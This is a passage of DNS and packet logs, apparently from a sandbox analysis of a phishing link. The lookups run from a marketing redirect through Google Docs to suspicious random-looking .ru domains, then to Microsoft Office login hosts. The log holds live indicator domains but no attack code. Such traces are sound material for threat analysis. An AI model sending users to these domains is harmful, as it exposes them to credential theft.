                                                                                        Dec 18, 2024 02:10:30.522820950 CET53523741.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.307651997 CET53649151.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.904174089 CET5690953192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:34.904347897 CET6373553192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:35.041239023 CET53569091.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.042093992 CET53637351.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:53.541472912 CET53581751.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:54.844363928 CET53507771.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:56.124187946 CET138138192.168.2.16192.168.2.255
                                                                                        Dec 18, 2024 02:10:57.112863064 CET6425253192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:57.113033056 CET5999853192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:10:57.354706049 CET53599981.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:57.354978085 CET53642521.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:00.926008940 CET5571653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:00.926223040 CET4991153192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:00.926668882 CET6527353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:00.926803112 CET5191653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:01.063592911 CET53652731.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:01.064376116 CET53519161.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:01.295372963 CET53499111.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.118469954 CET5820453192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.118613958 CET5378353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.119131088 CET6281553192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.119297981 CET5869053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.119496107 CET5213153192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.119626045 CET5969053192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.255875111 CET53586901.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.256397009 CET53628151.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.286063910 CET5556653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.286227942 CET5151753192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:03.425122976 CET53555661.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.425137997 CET53515171.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:03.502733946 CET53537831.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:09.515815973 CET5465153192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:09.518069029 CET5577353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:12.773943901 CET5478653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:12.774389029 CET5897353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:12.777138948 CET5265253192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:12.777276993 CET6453653192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:15.567972898 CET6118453192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:15.568105936 CET6351253192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:24.733007908 CET53597831.1.1.1192.168.2.16
                                                                                        Dec 18, 2024 02:11:34.910305023 CET4978353192.168.2.161.1.1.1
                                                                                        Dec 18, 2024 02:11:34.910418987 CET5487553192.168.2.161.1.1.1
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Dec 18, 2024 02:11:01.295464039 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                        Dec 18, 2024 02:11:03.502355099 CET192.168.2.161.1.1.1c327(Port unreachable)Destination Unreachable
                                                                                        Dec 18, 2024 02:11:13.172838926 CET192.168.2.161.1.1.1c2cd(Port unreachable)Destination Unreachable
                                                                                        Dec 18, 2024 02:11:23.483859062 CET192.168.2.161.1.1.1c23f(Port unreachable)Destination Unreachable
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 18, 2024 02:09:54.359380007 CET192.168.2.161.1.1.10x86daStandard query (0)recp.mkt81.netA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:54.359484911 CET192.168.2.161.1.1.10x4b1dStandard query (0)recp.mkt81.net65IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:56.454663992 CET192.168.2.161.1.1.10xfbbeStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:56.454859972 CET192.168.2.161.1.1.10x94a6Standard query (0)docs.google.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:58.262728930 CET192.168.2.161.1.1.10xc3faStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:58.263005972 CET192.168.2.161.1.1.10x7013Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:59.074861050 CET192.168.2.161.1.1.10x93e8Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:59.075006962 CET192.168.2.161.1.1.10x750fStandard query (0)docs.google.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:06.649198055 CET192.168.2.161.1.1.10x3f43Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:06.649198055 CET192.168.2.161.1.1.10x131bStandard query (0)docs.google.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:06.737771988 CET192.168.2.161.1.1.10x7262Standard query (0)lh7-rt.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:06.738054037 CET192.168.2.161.1.1.10x56a0Standard query (0)lh7-rt.googleusercontent.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:10.495294094 CET192.168.2.161.1.1.10x85ffStandard query (0)lh7-rt.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:10.495448112 CET192.168.2.161.1.1.10x1b47Standard query (0)lh7-rt.googleusercontent.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:22.591269970 CET192.168.2.161.1.1.10x69a4Standard query (0)dva.dgkifyron.ruA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:22.591439009 CET192.168.2.161.1.1.10x4a4cStandard query (0)dva.dgkifyron.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.609213114 CET192.168.2.161.1.1.10x589fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.609344006 CET192.168.2.161.1.1.10xd773Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.609900951 CET192.168.2.161.1.1.10xcb84Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.610006094 CET192.168.2.161.1.1.10x1fa9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.848383904 CET192.168.2.161.1.1.10x92abStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.848565102 CET192.168.2.161.1.1.10xd3adStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.370206118 CET192.168.2.161.1.1.10x4384Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.370724916 CET192.168.2.161.1.1.10x58f0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.382185936 CET192.168.2.161.1.1.10x77d9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.382405043 CET192.168.2.161.1.1.10x4a17Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:34.904174089 CET192.168.2.161.1.1.10xa3d1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:34.904347897 CET192.168.2.161.1.1.10x3ba4Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.112863064 CET192.168.2.161.1.1.10x865eStandard query (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.113033056 CET192.168.2.161.1.1.10xa7b0Standard query (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:00.926008940 CET192.168.2.161.1.1.10xed2dStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:00.926223040 CET192.168.2.161.1.1.10x4695Standard query (0)www.office.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:00.926668882 CET192.168.2.161.1.1.10x7598Standard query (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:00.926803112 CET192.168.2.161.1.1.10xa781Standard query (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.118469954 CET192.168.2.161.1.1.10x1b86Standard query (0)portal.office.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.118613958 CET192.168.2.161.1.1.10x7cddStandard query (0)portal.office.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.119131088 CET192.168.2.161.1.1.10xc6cStandard query (0)outlook.office.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.119297981 CET192.168.2.161.1.1.10x5272Standard query (0)outlook.office.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.119496107 CET192.168.2.161.1.1.10x3da8Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.119626045 CET192.168.2.161.1.1.10xdb78Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.286063910 CET192.168.2.161.1.1.10xeeb9Standard query (0)substrate.office.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.286227942 CET192.168.2.161.1.1.10x2bb7Standard query (0)substrate.office.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:09.515815973 CET192.168.2.161.1.1.10xb3b9Standard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:09.518069029 CET192.168.2.161.1.1.10xfdd5Standard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.773943901 CET192.168.2.161.1.1.10xfc5Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.774389029 CET192.168.2.161.1.1.10x7a79Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.777138948 CET192.168.2.161.1.1.10x48b6Standard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.777276993 CET192.168.2.161.1.1.10x4d11Standard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.567972898 CET192.168.2.161.1.1.10x3ac9Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.568105936 CET192.168.2.161.1.1.10x7d1bStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:34.910305023 CET192.168.2.161.1.1.10xf85aStandard query (0)m365cdn.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:34.910418987 CET192.168.2.161.1.1.10xa13fStandard query (0)m365cdn.nel.measure.office.net65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 18, 2024 02:09:55.147006989 CET1.1.1.1192.168.2.160x4b1dNo error (0)recp.mkt81.netrecipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:55.148667097 CET1.1.1.1192.168.2.160x86daNo error (0)recp.mkt81.netrecipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:55.148667097 CET1.1.1.1192.168.2.160x86daNo error (0)recipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.com15.157.143.48A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:55.148667097 CET1.1.1.1192.168.2.160x86daNo error (0)recipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.com3.98.167.185A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:56.591465950 CET1.1.1.1192.168.2.160xfbbeNo error (0)docs.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:58.399909973 CET1.1.1.1192.168.2.160x7013No error (0)www.google.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:58.399944067 CET1.1.1.1192.168.2.160xc3faNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:09:59.211648941 CET1.1.1.1192.168.2.160x93e8No error (0)docs.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:06.785964012 CET1.1.1.1192.168.2.160x3f43No error (0)docs.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:07.046103001 CET1.1.1.1192.168.2.160x56a0No error (0)lh7-rt.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:07.065989971 CET1.1.1.1192.168.2.160x7262No error (0)lh7-rt.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:07.065989971 CET1.1.1.1192.168.2.160x7262No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:10.634526968 CET1.1.1.1192.168.2.160x1b47No error (0)lh7-rt.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:10.635138035 CET1.1.1.1192.168.2.160x85ffNo error (0)lh7-rt.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:10.635138035 CET1.1.1.1192.168.2.160x85ffNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:23.143429041 CET1.1.1.1192.168.2.160x4a4cNo error (0)dva.dgkifyron.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:23.143441916 CET1.1.1.1192.168.2.160x69a4No error (0)dva.dgkifyron.ru172.67.214.93A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:23.143441916 CET1.1.1.1192.168.2.160x69a4No error (0)dva.dgkifyron.ru104.21.93.202A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746423006 CET1.1.1.1192.168.2.160x589fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746423006 CET1.1.1.1192.168.2.160x589fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746423006 CET1.1.1.1192.168.2.160x589fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746423006 CET1.1.1.1192.168.2.160x589fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746550083 CET1.1.1.1192.168.2.160x1fa9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746691942 CET1.1.1.1192.168.2.160xcb84No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:26.746691942 CET1.1.1.1192.168.2.160xcb84No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.988254070 CET1.1.1.1192.168.2.160x92abNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.988254070 CET1.1.1.1192.168.2.160x92abNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.988254070 CET1.1.1.1192.168.2.160x92abNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:28.988254070 CET1.1.1.1192.168.2.160x92abNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.507102013 CET1.1.1.1192.168.2.160x4384No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.507102013 CET1.1.1.1192.168.2.160x4384No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.507430077 CET1.1.1.1192.168.2.160x58f0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.519228935 CET1.1.1.1192.168.2.160x77d9No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.519228935 CET1.1.1.1192.168.2.160x77d9No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:30.520126104 CET1.1.1.1192.168.2.160x4a17No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:35.041239023 CET1.1.1.1192.168.2.160xa3d1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354706049 CET1.1.1.1192.168.2.160xa7b0No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:10:57.354978085 CET1.1.1.1192.168.2.160x865eNo error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063592911 CET1.1.1.1192.168.2.160x7598No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063741922 CET1.1.1.1192.168.2.160xed2dNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.063741922 CET1.1.1.1192.168.2.160xed2dNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.064376116 CET1.1.1.1192.168.2.160xa781No error (0)gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru65IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.295372963 CET1.1.1.1192.168.2.160x4695No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:01.295372963 CET1.1.1.1192.168.2.160x4695No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.254976034 CET1.1.1.1192.168.2.160x1b86No error (0)portal.office.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.254976034 CET1.1.1.1192.168.2.160x1b86No error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.255875111 CET1.1.1.1192.168.2.160x5272No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.255875111 CET1.1.1.1192.168.2.160x5272No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.255875111 CET1.1.1.1192.168.2.160x5272No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com40.99.70.210A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com40.99.70.178A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com52.98.61.50A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com40.99.32.114A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com40.99.70.194A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256397009 CET1.1.1.1192.168.2.160xc6cNo error (0)ooc-g2.tm-4.office.com52.98.95.210A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256794930 CET1.1.1.1192.168.2.160xdb78No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.256851912 CET1.1.1.1192.168.2.160x3da8No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com40.99.32.114A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com52.98.95.210A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com52.98.61.50A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com40.99.68.34A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com40.99.70.194A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com40.99.70.178A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425122976 CET1.1.1.1192.168.2.160xeeb9No error (0)ooc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425137997 CET1.1.1.1192.168.2.160x2bb7No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.425137997 CET1.1.1.1192.168.2.160x2bb7No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.502733946 CET1.1.1.1192.168.2.160x7cddNo error (0)portal.office.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.502733946 CET1.1.1.1192.168.2.160x7cddNo error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
